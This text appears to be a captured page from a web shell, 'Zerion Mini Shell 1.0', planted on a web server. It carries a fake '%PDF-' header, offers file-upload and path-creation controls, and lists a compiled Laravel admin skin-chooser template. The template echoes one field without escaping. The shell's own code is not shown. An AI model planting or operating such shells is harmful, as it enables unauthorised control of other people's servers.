%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/varak.net/paste.varak.net-5.6/app/storage/views/
Upload File :
Create Path :
Current File : /www/varak.net/paste.varak.net-5.6/app/storage/views/522532c9dc1d5b7b419419e0deea4baf

<?php $__env->startSection('module'); ?>
	<section id="admin-skin">
		<fieldset>
			<legend><?php echo Lang::get('admin.skin_chooser'); ?></legend>

			<?php foreach($skins as $skin): ?>
				<div class="row">
					<div class="col-sm-12">
						<?php echo HTML::image(url('admin/skin/preview/'.urlencode($skin->key)), NULL, array(
								'class'   => 'img-thumbnail pull-left hidden-xs',
								'width'   => 310,
								'height'  => 190,
							)); ?>


						<h3>
							<?php echo e($skin->name); ?>


							<small>
								<?php echo Lang::get('admin.version'); ?>:
								<?php echo e($skin->version); ?>

							</small>
						</h3>

						<?php if( ! empty($skin->author)): ?>
							<p>
								<?php echo Lang::get('global.author'); ?>:
								<?php echo $skin->author; ?>

							</p>
						<?php endif; ?>

						<p><?php echo e($skin->description); ?></p>

						<?php if($site->general->skin == $skin->key): ?>
							<button class="btn btn-success disabled" disabled="disabled">
								<span class="glyphicon glyphicon-ok"></span>
								<?php echo Lang::get('admin.active'); ?>

							</button>
						<?php else: ?>
							<?php echo link_to(url('admin/skin/set/'.urlencode($skin->key)), Lang::get('admin.use_theme'), array(
									'class' => 'btn btn-primary',
								)); ?>

						<?php endif; ?>
					</div>
				</div>

				<br />
			<?php endforeach; ?>
		</fieldset>
	</section>
<?php $__env->stopSection(); ?>

<?php echo $__env->make('skins.bootstrap.admin.layout', array_except(get_defined_vars(), array('__data', '__path')))->render(); ?>

Zerion Mini Shell 1.0